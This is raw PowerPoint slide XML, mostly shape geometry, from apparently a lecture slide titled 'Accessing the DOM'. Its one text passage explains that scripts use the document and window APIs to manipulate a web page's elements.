        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842250"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79" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D22E929-6B79-844A-864C-B208B58072AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="786923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0" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD8C518-0634-0A45-B160-FD55AE2C4679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8443913" y="7319963"/>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1" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25483CC6-629C-1247-A3FA-406D90EFCA1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8472488" y="7362825"/>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2" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28181A25-A319-464A-A974-06F4AC878196}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827881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789" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="177789" y="38099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203179" y="19049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1777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1083" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D503FE14-CD32-B749-B9D4-C28F689BF373}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8443913" y="7405688"/>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4" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B63B3C8-295F-7949-BD66-310E5792ED7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="847248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5" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C238A02-6E39-964E-95F7-5CA32DD8FE1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9043988"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6" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8F6577F-B710-D54C-A34C-01EBCF692DE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9070975" y="7362825"/>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7" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69036893-CF3D-EE4A-8472-B5235645A521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9043988"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8" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA6B836B-911D-5F4F-9D73-9E5EDCB81140}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9070975" y="7434263"/>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89" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A30729DA-FDD2-0343-9801-BD7E5A0B2C5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9712325" y="7391400"/>
            <a:ext cx="44450" cy="42863"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 20320"/>
              <a:gd name="T1" fmla="*/ 0 h 20320"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 20320"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 20320"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T4">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T5">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="20320" h="20320">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20330" y="20311"/>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90" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B5E55F6-FFC0-9542-99CB-BB1F0F25864B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9653588" y="7331075"/>
            <a:ext cx="65087" cy="66675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T5" fmla="*/ 0 h 30479"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T7" fmla="*/ 0 h 30479"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T9" fmla="*/ 0 h 30479"/>
              <a:gd name="T10" fmla="*/ 0 w 30479"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T12" fmla="*/ 0 w 30479"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T14" fmla="*/ 0 w 30479"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T16" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T17" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T18" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T19" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T20" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T21" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T22" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T23" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T24" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T25" fmla="*/ 2147483646 h 304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479" h="30479">
                <a:moveTo>
                  <a:pt x="30388" y="15180"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="30388" y="6798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23591" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15179" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6797" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6797" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15179" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23591" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30388" y="23574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30388" y="15180"/>
                </a:lnTo>
                <a:close/>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91" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{511EAA00-E421-484B-8A56-C0BB9A439FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9480550" y="7323138"/>
            <a:ext cx="103188" cy="114300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T11" fmla="*/ 0 h 50164"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T14" fmla="*/ 2035069958 w 48260"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T16" fmla="*/ 0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5096" y="49699"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38471" y="45808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47750" y="35706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47067" y="17943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41428" y="6143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32268" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15804" y="2163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4953" y="9550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20495"/>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92" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{063BB1E1-7441-8241-9ABB-9F425F482618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9445625" y="7362825"/>
            <a:ext cx="65088"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93" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{921CE497-6CD3-7F4A-9261-85E0C4C77F37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9815513" y="7323138"/>
            <a:ext cx="107950" cy="114300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T4" fmla="*/ 0 w 48260"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T6" fmla="*/ 621453573 w 48260"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T11" fmla="*/ 0 h 50164"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T16" fmla="*/ 2147483646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2697" y="49705"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9214" y="45814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711" y="17940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6370" y="6138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32001" y="2169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42849" y="9563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47796" y="20516"/>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094" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6714FD8-3C38-BF4A-BD86-8F934588EB51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9888538" y="7362825"/>
            <a:ext cx="66675"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88384550-18B0-6B48-8A13-AF629658C57F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234950" y="223838"/>
            <a:ext cx="4792663" cy="477837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="82768" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3100" spc="243" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Acc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-221" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="11" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="409" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="265" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="88" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="506" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45EA3B5D-324A-8A48-AE77-5ED7FA06A928}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9351963" y="7505700"/>
            <a:ext cx="554037" cy="200025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="28057" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1300" spc="-144" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-188" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-188" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-144" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131097" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72AC5B3F-3218-1144-9DFD-368EA26B62B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="758825" y="806450"/>
            <a:ext cx="85375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400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When creating a script (in-line in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>element or by means of a script loading instruction) the API for the document or window elements can be used to manipulate the document itself or to get at the children of that document, which are the various elements in the web page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object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01B4E1F7-5A46-BF40-8105-9676417AF7D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7869238" y="734853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23" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5C6647B-12D3-A647-ACAF-4203FA275C85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="767556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820" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="177820" y="38099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203210" y="19049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17782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3124" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E67A26E8-915D-9D43-8BB3-1868A93D8D02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842250"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25" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1816B9BD-BE38-A34D-B31B-D50BFCF9B0B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7869238" y="737711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26" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AACFE6-3171-534D-BFEE-84D3D348E335}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842250"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27" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5FBF3E9-14A5-1842-9C7B-CAEB622BDFDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="786923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28" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{170C0EFF-23E3-F145-96DF-2401E557FA30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8443913" y="7319963"/>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29" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10B31E11-7DAE-D841-AD38-C11329F53A90}"/>
